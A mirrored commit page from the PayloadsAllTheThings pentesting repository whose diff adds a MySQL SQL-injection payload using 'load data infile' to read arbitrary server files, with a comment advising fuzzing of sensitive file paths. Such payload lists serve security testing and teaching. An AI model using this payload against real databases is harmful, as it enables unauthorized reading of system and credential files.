mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-01-11 04:33:14 -08:00
Fix name - Part 1
This commit is contained in:
@@ -0,0 +1,3 @@
|
||||
# mysql local file disclosure through sqli
|
||||
# fuzz interesting absolute filepath/filename into <filepath>
|
||||
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
||||
Reference in New Issue
Block a user